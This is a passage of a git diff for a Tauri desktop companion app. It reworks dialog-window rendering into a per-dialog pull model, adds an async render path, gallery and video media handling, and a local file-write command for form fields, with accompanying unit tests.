-    // built fresh (first render of this session, or after the user
-    // closed it), `ensure_dialog_window` reset the ready flag.
-    // Window-size estimate is per-spec — wide widgets widen, long
-    // forms grow vertically. v0.4.40.
-    let size = crate::dialog::estimate_dialog_size(&dr.spec);
-    surface_main_window(&state.app, &id, size);
-
-    // Window-ready handshake: wait until the frontend signals that
-    // its `dialog:show` listener is registered. Without this gate
-    // we'd race against Vite-bundle-load + Svelte-mount + tauri-listen,
-    // and on the first render of a session the emit would land before
-    // the listener — silent loss, 500 ms ack timeout, webview reload
-    // and a confused user staring at a blank window.
-    wait_for_dialog_ready(&state.app, "pre-emit").await;
-
-    // Emit the dialog to the frontend.
-    if let Err(e) = state
-        .app
-        .emit_to(crate::DIALOG_WINDOW_LABEL, "dialog:show", &dr)
+    // Build a fresh window labelled by the dialog id (Step 4 pull model). The
+    // window reads its own label and fetches the spec via `get_dialog_spec` on
+    // mount — there is no `dialog:show` emit, no ready-handshake, no ack
+    // timeout, and no reload-retry, because the frontend initiates and so
+    // can't race an event it isn't listening for yet. Window ops are
+    // main-thread-only.
     {
-        trace(&format!("render: emit FAILED: {e}"));
-    } else {
-        trace(&format!("render: emitted dialog:show id={}", id));
-    }
-
-    // ── Ack-Contract ────────────────────────────────────────────────────
-    // Wait briefly for the frontend to confirm receipt. If no ack arrives,
-    // the WebView event loop is most likely dead — try to revive it by
-    // reloading the webview, then re-emitting once. If the second ack also
-    // fails, give up and surface a structured error to the caller instead
-    // of blocking indefinitely on a dialog the user will never see.
-    match tokio::time::timeout(DIALOG_ACK_TIMEOUT, ack_rx).await {
-        Ok(Ok(())) => {
-            trace(&format!("render: ack ok id={}", id));
-        }
-        _ => {
-            trace(&format!(
-                "render: no ack within {:?}; reloading webview and retrying",
-                DIALOG_ACK_TIMEOUT
-            ));
-            // Reset ready flag — after reload the listeners need to
-            // re-register. We'll wait on the handshake again before
-            // re-emitting.
-            if let Some(tx) = state
-                .app
-                .try_state::<std::sync::Arc<tokio::sync::watch::Sender<bool>>>()
-            {
-                let _ = tx.inner().send(false);
-            }
-            reload_main_webview(&state.app);
-            tokio::time::sleep(RELOAD_SETTLE).await;
-
-            // Wait for the freshly-mounted Svelte to signal listeners
-            // are wired up again. Without this the same race that got
-            // us here would just repeat after reload.
-            wait_for_dialog_ready(&state.app, "post-reload").await;
-
-            // After reload the previous ack receiver was consumed. We need a
-            // fresh handshake on the same dialog id — register a new ack
-            // slot tied to the same id is overkill; instead we just re-emit
-            // and wait on the same (already-armed) ack registry by treating
-            // the second emit's resolution as the ack we care about.
-            //
-            // Since `register()` only created one ack channel and we just
-            // consumed its receiver via the timeout, we have to fall back
-            // to a small generic ack via the AckRegistry for the second
-            // round. That keeps DialogState simple.
-            let (probe_id, probe_rx) = state.ui_acks.register();
-            if let Err(e) = state
-                .app
-                .emit_to(crate::DIALOG_WINDOW_LABEL, "ui:ping", &probe_id)
+        let app_for_build = state.app.clone();
+        let id_for_build = id.clone();
+        let title_for_build = window_title;
+        let _ = state.app.run_on_main_thread(move || {
+            if let Err(e) =
+                crate::build_dialog_window(&app_for_build, &id_for_build, size, &title_for_build)
             {
-                trace(&format!("render: post-reload ui:ping emit failed: {e}"));
-                state.ui_acks.forget(&probe_id);
-            }
-            match tokio::time::timeout(DIALOG_ACK_TIMEOUT, probe_rx).await {
-                Ok(Ok(())) => {
-                    trace("render: post-reload webview is responsive, re-emitting dialog:show");
-                    if let Err(e) =
-                        state.app.emit_to(crate::DIALOG_WINDOW_LABEL, "dialog:show", &dr)
-                    {
-                        trace(&format!("render: re-emit FAILED: {e}"));
-                    }
-                }
-                _ => {
-                    state.ui_acks.forget(&probe_id);
-                    trace("render: webview still unreachable after reload — giving up");
-                    state.dialog.cancel(&id);
-                    return (
-                        StatusCode::SERVICE_UNAVAILABLE,
-                        Json(serde_json::json!({
-                            "error": "ui_unreachable",
-                            "detail": "webview did not acknowledge dialog:show after reload",
-                        })),
-                    )
-                        .into_response();
-                }
+                trace(&format!(
+                    "render: build_dialog_window failed id={id_for_build}: {e}"
+                ));
             }
-        }
+        });
     }
 
-    // ── Normal path ─────────────────────────────────────────────────────
-    // Wait for the user's submit/cancel — but bounded by `DIALOG_TTL`. A
-    // dialog that nobody answers eventually returns a structured timeout
-    // instead of blocking the caller indefinitely (#36). The same TTL is
-    // used by the registry's opportunistic sweep, so a timed-out entry
-    // gets cancelled regardless of whether this awaiter or the next
-    // `register()` call notices first.
-    trace(&format!("render: awaiting user response id={}", id));
-    let result = match tokio::time::timeout(DIALOG_TTL, result_rx).await {
-        Ok(Ok(r)) => r,
-        Ok(Err(_)) => crate::dialog::DialogResult {
-            id: id.clone(),
-            cancelled: true,
-            result: serde_json::Value::Null,
-            reason: Some("channel_dropped".into()),
-        },
-        Err(_) => {
-            // TTL expired without user response. Cancel the registry
-            // entry (frees its slot) and fall through to the normal
-            // 200-OK response below with cancelled:true + reason.
-            //
-            // v0.4.45 (Bug #5): previously this returned HTTP 408, which
-            // mcp.rs's render_dialog treated as a non-success status →
-            // generic "aiui tool error: render http 408" — a different
-            // shape than a user-driven cancel (200 {cancelled:true}).
-            // The agent then saw a transport error instead of a clean
-            // "user didn't respond" cancellation. Now both the
-            // user-cancel and the TTL-expiry paths produce the exact
-            // same tool-result shape; only `reason` differs.
-            trace(&format!("render: TTL expired id={}", id));
-            state.dialog.cancel(&id);
-            crate::dialog::DialogResult {
-                id: id.clone(),
-                cancelled: true,
-                result: serde_json::Value::Null,
-                reason: Some("ttl_expired".into()),
-            }
+    // ── Async branch (Step 3) ───────────────────────────────────────────
+    // If the caller opted in (header `x-aiui-async`), hand the dialog off to a
+    // detached task and answer immediately with `{id, ttl_secs}` (202). The
+    // caller polls `GET /render/{id}`. This removes the multi-minute open HTTP
+    // connection that a tunnel/GUI blip turns into a remote ReadError —
+    // resolution now lives in a task, not on the wire.
+    if headers.contains_key(ASYNC_RENDER_HEADER) {
+        // The detached task owns resolution + window teardown from here.
+        guard.disarm();
+        sweep_async_slots(&state);
+        {
+            let mut slots = state.async_slots.lock().unwrap();
+            slots.insert(
+                id.clone(),
+                AsyncSlot { result: None, created_at: Instant::now() },
+            );
         }
-    };
-    trace(&format!(
-        "render: got response id={} cancelled={}",
-        result.id, result.cancelled
-    ));
-
-    // Authoritative teardown (v0.4.46, Bug B): the render has reached a
-    // terminal outcome — user submit/cancel, native X-close, TTL expiry,
-    // or channel-drop. Destroy the dialog window now, from Rust, on the
-    // main thread. This is the single point that guarantees a dialog
-    // window never outlives its dialog: it covers the TTL/channel-drop
-    // paths the frontend's own close never reaches (the empty-window
-    // stranding of 2026-05-29), and is a harmless no-op on the
-    // submit/cancel paths where the window is already gone.
-    {
-        let app_for_destroy = state.app.clone();
-        let _ = state
-            .app
-            .run_on_main_thread(move || crate::destroy_dialog_window(&app_for_destroy));
+        let task_state = state.clone();
+        let task_id = id.clone();
+        tokio::spawn(async move {
+            let result = resolve_dialog(task_state.clone(), task_id.clone(), result_rx).await;
+            if let Some(slot) = task_state.async_slots.lock().unwrap().get_mut(&task_id) {
+                slot.result = Some(result);
+            }
+        });
+        trace(&format!("render: async accepted id={}", id));
+        return (
+            StatusCode::ACCEPTED,
+            Json(serde_json::json!({ "id": id, "ttl_secs": DIALOG_TTL.as_secs() })),
+        )
+            .into_response();
     }
 
+    // ── Synchronous path (legacy, backward-compatible) ──────────────────
+    // No opt-in header → hold the connection until the user answers, exactly
+    // as before. The guard stays armed across the inline await so a dropped
+    // connection still cleans up; `resolve_dialog` runs the terminal teardown.
+    let result = resolve_dialog(state.clone(), id.clone(), result_rx).await;
+    guard.disarm();
+
     // Lifecycle-driven update check (#42): fire once after every
     // successful render. Frontend gates with a 30-min cooldown so this is
     // never noisier than the old 6h timer in active use, and zero load
@@ -810,97 +1052,6 @@ async fn render(
     .into_response()
 }
 
-/// Wait until the dialog window's frontend signals via the
-/// `dialog_window_ready` Tauri command that its `dialog:show` and
-/// `ui:ping` listeners are registered. Times out after
-/// `DIALOG_READY_TIMEOUT` and returns either way — the caller still
-/// emits, falling back to the existing ack/reload contract if the
-/// frontend turns out to be slower than expected.
-///
-/// Called twice in the render path: once before the initial emit
-/// (covers the cold-start race when the window is built fresh), once
-/// after a webview reload (covers the same race after the recovery
-/// path tears down the JS state).
-const DIALOG_READY_TIMEOUT: Duration = Duration::from_millis(3000);
-
-async fn wait_for_dialog_ready(app: &AppHandle, phase: &str) {
-    let Some(tx_state) = app.try_state::<std::sync::Arc<tokio::sync::watch::Sender<bool>>>()
-    else {
-        trace(&format!("render: dialog_ready_tx state missing ({phase})"));
-        return;
-    };
-    let mut rx = tx_state.inner().subscribe();
-    if *rx.borrow() {
-        trace(&format!("render: dialog already ready ({phase})"));
-        return;
-    }
-    let started = std::time::Instant::now();
-    let waited = tokio::time::timeout(DIALOG_READY_TIMEOUT, async {
-        while !*rx.borrow_and_update() {
-            if rx.changed().await.is_err() {
-                break;
-            }
-        }
-    })
-    .await;
-    if waited.is_ok() && *rx.borrow() {
-        trace(&format!(
-            "render: dialog ready ({phase}) after {:?}",
-            started.elapsed()
-        ));
-    } else {
-        trace(&format!(
-            "render: dialog-ready timeout ({phase}) after {:?} — proceeding anyway",
-            started.elapsed()
-        ));
-    }
-}
-
-/// Surface the dialog window for the incoming render. If the window
-/// already exists, show + focus + unminimize + resize to fit this
-/// spec; otherwise build it at the spec-derived inner size.
-/// All Tauri window operations have to run on the main thread, so we
-/// hop there via `run_on_main_thread`.
-fn surface_main_window(app: &AppHandle, id: &str, size: (f64, f64)) {
-    let app_for_show = app.clone();
-    let id_for_log = id.to_string();
-    let rc = app.clone().run_on_main_thread(move || {
-        trace(&format!(
-            "render: main-thread callback id={} size=({:.0},{:.0})",
-            id_for_log, size.0, size.1
-        ));
-        match crate::ensure_dialog_window(&app_for_show, size) {
-            Ok(_win) => {
-                trace("render: main-thread dialog window ready (show/build)");
-            }
-            Err(e) => {
-                trace(&format!("render: main-thread dialog window FAILED: {e}"));
-            }
-        }
-    });
-    trace(&format!("render: run_on_main_thread returned {:?}", rc.is_ok()));
-}
-
-/// Reload the main webview to recover from a stuck JS event loop. Tears
-/// down the JS side (DOM, listeners, setIntervals) and re-runs the Svelte
-/// app from scratch — Tauri's `webview.reload()` is exactly this. We use
-/// it as the recreate path because it's lighter than destroying and
-/// rebuilding the window via `WebviewWindowBuilder` and recovers from the
-/// same class of failure.
-fn reload_main_webview(app: &AppHandle) {
-    let app_for_reload = app.clone();
-    let _ = app.clone().run_on_main_thread(move || {
-        if let Some(win) = app_for_reload.get_webview_window(crate::DIALOG_WINDOW_LABEL) {
-            trace("render: reloading dialog webview");
-            if let Err(e) = win.eval("location.reload()") {
-                trace(&format!("render: reload eval failed: {e}"));
-            }
-        } else {
-            trace("render: reload requested but main window is MISSING");
-        }
-    });
-}
-
 #[cfg(test)]
 mod validate_tests {
     use super::validate_spec;
@@ -936,6 +1087,34 @@ mod validate_tests {
         assert!(err.0.contains("ask|form|confirm"));
     }
 
+    #[test]
+    fn accepts_gallery_with_items() {
+        let spec = json!({"kind":"gallery","items":[
+            {"value":"a","src":"data:image/png;base64,AAAA"},
+            {"value":"b","src":"https://x.test/clip.mp4"}
+        ]});
+        assert!(validate_spec(&spec).is_ok());
+    }
+
+    #[test]
+    fn rejects_gallery_without_items() {
+        let err = validate_spec(&json!({"kind":"gallery"})).unwrap_err();
+        assert!(err.0.contains("items"), "got: {}", err.0);
+    }
+
+    #[test]
+    fn rejects_gallery_empty_items() {
+        let err = validate_spec(&json!({"kind":"gallery","items":[]})).unwrap_err();
+        assert!(err.0.contains("empty"), "got: {}", err.0);
+    }
+
+    #[test]
+    fn rejects_gallery_item_without_value() {
+        let spec = json!({"kind":"gallery","items":[{"src":"data:image/png;base64,AAAA"}]});
+        let err = validate_spec(&spec).unwrap_err();
+        assert!(err.0.contains("value"), "got: {}", err.0);
+    }
+
     #[test]
     fn rejects_missing_top_level_kind() {
         assert!(validate_spec(&json!({"title":"x"})).is_err());
@@ -957,3 +1136,104 @@ mod validate_tests {
         assert!(validate_spec(&spec).is_err());
     }
 }
+
+#[cfg(test)]
+mod render_guard_tests {
+    use super::RenderGuard;
+    use crate::dialog::DialogState;
+    use std::sync::Arc;
+
+    // Regression: the 409-storm + stranded-empty-window pair (2026-05-30).
+    // When the /render handler future is dropped (client give-up) the registry
+    // entry must be freed immediately, not left pending for the 2 h TTL. The
+    // window-destroy half needs a Tauri app, so these cover the registry half
+    // (`app: None`) — the half that produces the 409.
+
+    fn reg(ds: &DialogState) -> (String, tokio::sync::oneshot::Receiver<crate::dialog::DialogResult>) {
+        ds.register_dialog(serde_json::json!({"kind": "confirm"}), None, None, 0)
+    }
+
+    #[test]
+    fn armed_guard_drop_frees_registry_slot() {
+        let ds = Arc::new(DialogState::new());
+        let (id, result_rx) = reg(&ds);
+        assert_eq!(ds.stats().orphan_count, 1);
+        {
+            let _guard = RenderGuard {
+                id: id.clone(),
+                dialog: ds.clone(),
+                app: None,
+                armed: true,
+            };
+            // future "dropped" here
+        }
+        // Slot freed → a later render isn't blocked behind a leaked entry.
+        assert_eq!(ds.stats().orphan_count, 0);
+        // The awaiter observes a cancelled terminal result, not a hang.
+        let r = result_rx.blocking_recv().expect("result_tx sent on cancel");
+        assert!(r.cancelled);
+    }
+
+    #[test]
+    fn disarmed_guard_drop_leaves_terminal_path_untouched() {
+        // The normal terminal path disarms after its own teardown; the guard
+        // must then do nothing (no double-cancel, no spurious slot churn).
+        let ds = Arc::new(DialogState::new());
+        let (id, _result_rx) = reg(&ds);
+        {
+            let mut guard = RenderGuard {
+                id: id.clone(),
+                dialog: ds.clone(),
+                app: None,
+                armed: true,
+            };
+            guard.disarm();
+        }
+        // Entry untouched by the disarmed guard (the real handler's explicit
+        // `complete`/`cancel` owns removal on the terminal path).
+        assert_eq!(ds.stats().orphan_count, 1);
+    }
+}
+
+#[cfg(test)]
+mod async_render_tests {
+    use super::{drain_async_slot, AsyncSlot, SlotLook};
+    use std::collections::HashMap;
+    use std::time::Instant;
+
+    // Step 3: the GET /render/{id} branching — pending → ready (drained once)
+    // → gone — without a Tauri app.
+    #[test]
+    fn slot_lifecycle_pending_ready_gone() {
+        let mut slots: HashMap<String, AsyncSlot> = HashMap::new();
+        slots.insert(
+            "x".into(),
+            AsyncSlot { result: None, created_at: Instant::now() },
+        );
+
+        // Registered, not resolved → Pending.
+        assert!(matches!(drain_async_slot(&mut slots, "x"), SlotLook::Pending));
+        // Unknown id → Gone.
+        assert!(matches!(drain_async_slot(&mut slots, "nope"), SlotLook::Gone));
+
+        // Resolve it.
+        slots.get_mut("x").unwrap().result = Some(crate::dialog::DialogResult {
+            id: "x".into(),
+            cancelled: true,
+            result: serde_json::Value::Null,
+            reason: Some("window_closed".into()),
+        });
+
+        // First drain delivers the terminal result.
+        match drain_async_slot(&mut slots, "x") {
+            SlotLook::Ready(r) => {
+                assert!(r.cancelled);
+                assert_eq!(r.reason.as_deref(), Some("window_closed"));
+            }
+            _ => panic!("expected Ready"),
+        }
+        // Slot was removed → a second drain is Gone (no double-delivery).
+        assert!(matches!(drain_async_slot(&mut slots, "x"), SlotLook::Gone));
+        assert!(slots.is_empty());
+    }
+}
diff --git a/companion/src-tauri/src/imageresolve.rs b/companion/src-tauri/src/imageresolve.rs
index 3ddd259..40ab9e6 100644
--- a/companion/src-tauri/src/imageresolve.rs
+++ b/companion/src-tauri/src/imageresolve.rs
@@ -242,6 +242,12 @@ fn guess_mime_from_extension(path: &Path) -> &'static str {
         Some("ico") => "image/x-icon",
         Some("avif") => "image/avif",
         Some("heic") => "image/heic",
+        // Video — for the gallery widget's `<video controls>`. Small clips
+        // inline as data: here; large ones exceed MAX_IMAGE_BYTES and are
+        // left as-is (the scp/push transfer path handles those).
+        Some("mp4" | "m4v") => "video/mp4",
+        Some("mov") => "video/quicktime",
+        Some("webm") => "video/webm",
         // Unknown extension: hand it to the WebView as octet-stream.
         // It will likely fail to render, but that's a clear "your file
         // isn't an image" signal rather than a misleading mime guess.
@@ -249,6 +255,70 @@ fn guess_mime_from_extension(path: &Path) -> &'static str {
     }
 }
 
+/// Reports whether `s` is a local-filesystem path with a video extension
+/// (`.mp4`, `.mov`, `.m4v`, `.webm`, case-insensitive). Used to route video via
+/// the push-to-cache `/media` path, not the (10 MB-capped, base64-bloating)
+/// `data:` inliner. Mirrors `isVideo` in `Gallery.svelte` and the Python bridge.
+pub fn is_local_video_path(s: &str) -> bool {
+    if !looks_like_local_path(s) {
+        return false;
+    }
+    // Compare case-insensitively, and ignore any query/fragment a path-ish
+    // string might carry after the file name.
+    let lowered = s.to_ascii_lowercase();
+    let path_part = lowered.split(['?', '#']).next().unwrap_or(&lowered);
+    [".mp4", ".mov", ".m4v", ".webm"]
+        .iter()
+        .any(|suffix| path_part.ends_with(*suffix))
+}
+
+/// Lowercase extension (no dot) of a local video path, for naming the uploaded
+/// cache file. Yields `mp4` unless the text after the last `.` is alphanumeric.
+pub fn video_ext(s: &str) -> String {
+    let stem = s.split(['?', '#']).next().unwrap_or(s);
+    let ext = stem.rsplit_once('.').map_or("", |(_, tail)| tail).to_ascii_lowercase();
+    if ext.is_empty() || !ext.bytes().all(|b| b.is_ascii_alphanumeric()) { "mp4".to_string() } else { ext }
+}
+
+/// Gather each distinct local video path found in a `src`/`thumbnail` slot
+/// anywhere in the spec, in the order `walk` first visits it. The bridge
+/// uploads each to the Mac's `/media` endpoint and then calls [`replace_srcs`]
+/// to swap paths for playback URLs — all *before* [`resolve_local_paths`] runs,
+/// so the image inliner never sees (or tries to base64) a 200 MB video.
+pub fn collect_local_video_paths(spec: &Value) -> Vec<String> {
+    let mut paths: Vec<String> = Vec::new();
+    walk(spec, &mut |key, value| {
+        // Only string values sitting in a media slot are candidates.
+        let candidate = match value.as_str() {
+            Some(text) if SRC_KEYS.contains(&key) => text,
+            _ => return,
+        };
+        if is_local_video_path(candidate) && !paths.iter().any(|seen| seen == candidate) {
+            paths.push(candidate.to_string());
+        }
+    });
+    paths
+}
+
+/// Rewrite every `src`/`thumbnail` string that is a key of `map` to the value
+/// mapped to it; other values are left alone, and an empty `map` is a no-op.
+/// Used to swap uploaded local video paths for `/media/blob/...` playback URLs.
+pub fn replace_srcs(spec: &mut Value, map: &std::collections::HashMap<String, String>) {
+    if map.is_empty() {
+        return;
+    }
+    walk_mut(spec, &mut |key, value| {
+        // Resolve the replacement before mutating, so `value` is not borrowed.
+        let swap = match value.as_str() {
+            Some(path) if SRC_KEYS.contains(&key) => map.get(path).cloned(),
+            _ => None,
+        };
+        if let Some(url) = swap {
+            *value = Value::String(url);
+        }
+    });
+}
+
 fn walk(value: &Value, f: &mut impl FnMut(&str, &Value)) {
     match value {
         Value::Object(map) => {
@@ -330,6 +400,62 @@ mod tests {
     use super::*;
     use serde_json::json;
 
+    #[test]
+    fn is_local_video_path_classifies_correctly() {
+        assert!(is_local_video_path("/Users/me/clip.mp4"));
+        assert!(is_local_video_path("~/Movies/take.MOV"));
+        assert!(is_local_video_path("/tmp/a.webm"));
+        assert!(is_local_video_path("/tmp/a.m4v"));
+        // Not local, or not video.
+        assert!(!is_local_video_path("https://x.test/clip.mp4"));
+        assert!(!is_local_video_path("data:video/mp4;base64,AAAA"));
+        assert!(!is_local_video_path("/Users/me/photo.png"));
+        assert!(!is_local_video_path("relative/clip.mp4"));
+    }
+
+    #[test]
+    fn collect_and_replace_local_videos() {
+        let spec = json!({
+            "kind": "gallery",
+            "items": [
+                {"value": "a", "src": "/Users/me/one.mp4"},
+                {"value": "b", "src": "https://x.test/two.mp4"},
+                {"value": "c", "src": "/Users/me/pic.png"},
+                {"value": "d", "thumbnail": "/Users/me/one.mp4"}
+            ]
+        });
+        let mut found = collect_local_video_paths(&spec);
+        found.sort();
+        // De-duplicated: the same path in two slots appears once.
+        assert_eq!(found, vec!["/Users/me/one.mp4".to_string()]);
+
+        let mut spec = spec;
+        let mut map = std::collections::HashMap::new();
+        map.insert(
+            "/Users/me/one.mp4".to_string(),
+            "http://127.0.0.1:7777/media/blob/x.mp4".to_string(),
+        );
+        replace_srcs(&mut spec, &map);
+        assert_eq!(
+            spec["items"][0]["src"].as_str().unwrap(),
+            "http://127.0.0.1:7777/media/blob/x.mp4"
+        );
+        assert_eq!(
+            spec["items"][3]["thumbnail"].as_str().unwrap(),
+            "http://127.0.0.1:7777/media/blob/x.mp4"
+        );
+        // Untouched: https video and the image.
+        assert_eq!(spec["items"][1]["src"].as_str().unwrap(), "https://x.test/two.mp4");
+        assert_eq!(spec["items"][2]["src"].as_str().unwrap(), "/Users/me/pic.png");
+    }
+
+    #[test]
+    fn video_ext_extracts_lowercase_extension() {
+        assert_eq!(video_ext("/a/b.MP4"), "mp4");
+        assert_eq!(video_ext("~/x.webm"), "webm");
+        assert_eq!(video_ext("/a/take.mov"), "mov");
+    }
+
     #[test]
     fn collects_src_at_any_depth() {
         let spec = json!({
diff --git a/companion/src-tauri/src/lib.rs b/companion/src-tauri/src/lib.rs
index 1558a3a..7d1d3ce 100644
--- a/companion/src-tauri/src/lib.rs
+++ b/companion/src-tauri/src/lib.rs
@@ -5,9 +5,12 @@ mod fsutil;
 mod housekeeping;
 mod http;
 mod imageresolve;
+mod filewrite;
+mod lifecycle_log;
 mod lifetime;
 mod logging;
 mod mcp;
+mod media;
 mod proc_ext;
 mod setup;
 mod skill;
@@ -26,6 +29,37 @@ use tauri::{Emitter, Manager, WebviewUrl, WebviewWindowBuilder};
 pub const SETUP_WINDOW_LABEL: &str = "setup";
 pub const DIALOG_WINDOW_LABEL: &str = "dialog";
 
+/// Timestamp of the most recent dialog-window teardown (X-close, submit/cancel
+/// close, or programmatic destroy). The macOS `RunEvent::Reopen` handler reads
+/// it to suppress the settings window when a Reopen fires merely as a
+/// *side-effect* of a dialog closing (2026-05-31 report: setup window popped up
+/// after closing a dialog) — as opposed to a genuine user reactivation.
+static LAST_DIALOG_TEARDOWN: std::sync::OnceLock<std::sync::Mutex<std::time::Instant>> =
+    std::sync::OnceLock::new();
+
+/// Stamp "a dialog window was just torn down" for the macOS Reopen handler.
+fn mark_dialog_teardown() {
+    let now = std::time::Instant::now();
+    let cell = LAST_DIALOG_TEARDOWN.get_or_init(|| std::sync::Mutex::new(now));
+    *cell.lock().unwrap() = now;
+}
+
+/// True when a dialog window was torn down within the last 1500 ms (false if
+/// none has been torn down yet). Only the macOS `RunEvent::Reopen` handler
+/// reads this — Windows surfaces a second instance via
+/// tauri-plugin-single-instance instead — so the function is `cfg`-gated to
+/// avoid a `dead_code` warning under
+/// `clippy --target x86_64-pc-windows-msvc -- -D warnings`. The matching
+/// `mark_dialog_teardown` writer stays cross-platform for any future reader.
+#[cfg(target_os = "macos")]
+fn dialog_torn_down_recently() -> bool {
+    const WINDOW: std::time::Duration = std::time::Duration::from_millis(1500);
+    match LAST_DIALOG_TEARDOWN.get() {
+        Some(last) => last.lock().unwrap().elapsed() < WINDOW,
+        None => false,
+    }
+}
+
 #[tauri::command]
 fn dialog_submit(
     state: tauri::State<'_, Arc<dialog::DialogState>>,
@@ -45,16 +79,90 @@ fn dialog_cancel(
     Ok(())
 }
 
-/// Frontend confirms it received the matching `dialog:show` event. The
-/// `/render` handler waits up to 500 ms for this before assuming the WebView
-/// event loop is dead and triggering a recreate.
+/// Issue #135: write the values of `target`-carrying form fields to **local**
+/// files, *before* the dialog result is sent back. The frontend calls this on
+/// affirmative submit **only for a local (native-app) session** with
+/// `{field_name: entered_value}`; for a bridge-served session (`session_origin`
+/// set) the bridge on the agent's host does the local write instead, so this
+/// is never invoked for those. The secret value thus travels WebView → here
+/// (local IPC) → file, and is **never** placed in the `dialog_submit` result
+/// that flows to the bridge/agent.
+///
+/// `target`/mode/path are read authoritatively from the **stored spec** (not
+/// from the frontend) so the destination can't be tampered with after the user
+/// approved it. Returns a per-field outcome map; for a `secret` field the
+/// outcome carries status only, never the value.
 #[tauri::command]
-fn dialog_received(
+fn write_dialog_targets(
     state: tauri::State<'_, Arc<dialog::DialogState>>,
     id: String,
-) -> Result<(), String> {
-    state.ack(&id);
-    Ok(())
+    values: std::collections::HashMap<String, String>,
+) -> Result<std::collections::HashMap<String, filewrite::WriteOutcome>, String> {
+    let req = state
+        .get_request(&id)
+        .ok_or_else(|| "dialog no longer active".to_string())?;
+
+    let mut out = std::collections::HashMap::new();
+    for field in collect_target_fields(&req.spec) {
+        let name = match field.get("name").and_then(|v| v.as_str()) {
+            Some(n) => n.to_string(),
+            None => continue,
+        };
+        let target: filewrite::Target =
+            match serde_json::from_value(field.get("target").cloned().unwrap_or_default()) {
+                Ok(t) => t,
+                Err(e) => {
+                    out.insert(
+                        name,
+                        filewrite::WriteOutcome::invalid(format!("bad target spec: {e}")),
+                    );
+                    continue;
+                }
+            };
+        let value = values.get(&name).map(String::as_str).unwrap_or("");
+        out.insert(name, filewrite::write_local(value, &target));
+    }
+    Ok(out)
+}
+
+/// Gather (as clones) every form field whose `target` is present and non-null,
+/// taking the flat `fields` array first and then each `tabs[].fields` in order.
+fn collect_target_fields(spec: &serde_json::Value) -> Vec<serde_json::Value> {
+    // Target-carrying fields of one container (the spec itself or one tab); a
+    // missing or non-array `fields` simply contributes nothing.
+    fn targeted(container: &serde_json::Value) -> impl Iterator<Item = &serde_json::Value> {
+        container
+            .get("fields")
+            .and_then(serde_json::Value::as_array)
+            .into_iter()
+            .flatten()
+            .filter(|field| field.get("target").is_some_and(|t| !t.is_null()))
+    }
+    // A missing or non-array `tabs` likewise yields no tabs at all.
+    let tabs = spec
+        .get("tabs")
+        .and_then(serde_json::Value::as_array)
+        .into_iter()
+        .flatten();
+    // Same order as a manual walk: top-level fields, then tab by tab.
+    targeted(spec)
+        .chain(tabs.flat_map(targeted))
+        .cloned()
+        .collect()
+}
+
+/// Multi-window pull model (Step 4): the per-id dialog window fetches its own
+/// render payload on mount, keyed by its window label (= the dialog id). This
+/// replaces the old `dialog:show` emit + `dialog_window_ready` ack handshake —
+/// the frontend initiates, so there is no event-before-listener race to guard.
+/// Returns `None` if the dialog is already gone (resolved/evicted), in which
+/// case the window closes itself.
+#[tauri::command]
+fn get_dialog_spec(
+    state: tauri::State<'_, Arc<dialog::DialogState>>,
+    id: String,
+) -> Result<Option<dialog::DialogRequest>, String> {
+    Ok(state.get_request(&id))
 }
 
 /// Frontend response to a `ui:ping` event from `/health`. Same shape as
@@ -68,19 +176,30 @@ fn ui_pong(
     Ok(())
 }
 
-/// Frontend signals that the dialog window is mounted and its
-/// `dialog:show` / `ui:ping` listeners are registered. The render
-/// path on the Rust side waits on this watch *before* emitting, so
-/// a freshly-built dialog window never receives a `dialog:show`
-/// event before the listener is up. Without this handshake we hit
-/// the 500 ms ack timeout, reload the WebView, and lose the user's
-/// dialog (the failure mode reported on 2026-05-03).
-#[tauri::command]
-fn dialog_window_ready(
-    tx: tauri::State<'_, Arc<tokio::sync::watch::Sender<bool>>>,
-) -> Result<(), String> {
-    let _ = tx.send(true);
-    Ok(())
+/// A dialog window's label IS its dialog id (Step 4 multi-window; no single
+/// reused `DIALOG_WINDOW_LABEL` window any more), so every window except setup
+/// counts as a dialog. NOTE(review): exclude any future non-dialog label here.
+fn is_dialog_window_label(label: &str) -> bool {
+    label != SETUP_WINDOW_LABEL
+}
+
+/// macOS: return the app to Accessory (no Dock icon) when nothing needs the
+/// Dock icon any more — no dialog window other than `except` is open (`except`
+/// is the one being torn down; `destroy()` may not have removed it from the
+/// window list yet) and setup is not visible. Undoes `build_dialog_window`.
+#[cfg(target_os = "macos")]
+fn demote_if_no_dialogs_except(app: &tauri::AppHandle, except: &str) {
+    let setup_visible = app
+        .get_webview_window(SETUP_WINDOW_LABEL)
+        .is_some_and(|w| w.is_visible().unwrap_or(false));
+    let another_dialog = app
+        .webview_windows()
+        .into_keys()
+        .any(|label| is_dialog_window_label(&label) && label != except);
+    if setup_visible || another_dialog {
+        return;
+    }
+    let _ = app.set_activation_policy(tauri::ActivationPolicy::Accessory);
 }
 
 #[tauri::command]
@@ -99,72 +218,63 @@ async fn close_window(window: tauri::WebviewWindow) -> Result<(), String> {
     let _ = window.close();
     log::debug!("[aiui] close_window: closed {label}");
 
-    // If that was the dialog window and no setup window is open,
-    // demote the app back to Accessory mode so we don't permanently
-    // grow a Dock icon. `ensure_dialog_window` promotes us to Regular
+    // If a dialog window just closed and nothing else needs the Dock icon,
+    // demote back to Accessory. `build_dialog_window` promoted us to Regular
     // for the dialog's lifetime; this is the matching demote.
-    #[cfg(target_os = "macos")]
-    if label == DIALOG_WINDOW_LABEL {
-        let setup_open = app
-            .get_webview_window(SETUP_WINDOW_LABEL)
-            .and_then(|w| w.is_visible().ok())
-            .unwrap_or(false);
-        if !setup_open {
-            let _ = app.set_activation_policy(tauri::ActivationPolicy::Accessory);
-        }
+    if is_dialog_window_label(&label) {
+        mark_dialog_teardown();
+        #[cfg(target_os = "macos")]
+        demote_if_no_dialogs_except(&app, &label);
     }
     Ok(())
 }
 
-/// Authoritatively tear down the dialog window from the Rust side
-/// (v0.4.46, Bug B). Uses `destroy()` (immediate) rather than `close()`
-/// so it bypasses the `CloseRequested` → frontend round-trip that could
-/// strand an empty window when the WebView's handler failed to complete
-/// the close. This is the single teardown point for the dialog window:
-/// the `/render` handler calls it once a render reaches *any* terminal
-/// outcome (submit, cancel, X-close, TTL, channel-drop), so the window
-/// can never outlive the dialog it was showing. Idempotent — a no-op
-/// when the window is already gone.
-pub(crate) fn destroy_dialog_window(app: &tauri::AppHandle) {
-    if let Some(win) = app.get_webview_window(DIALOG_WINDOW_LABEL) {
+/// Authoritatively tear down the dialog window with label `id` from the Rust
+/// side (v0.4.46, Bug B; Step 4: now per-id). Uses `destroy()` (immediate)
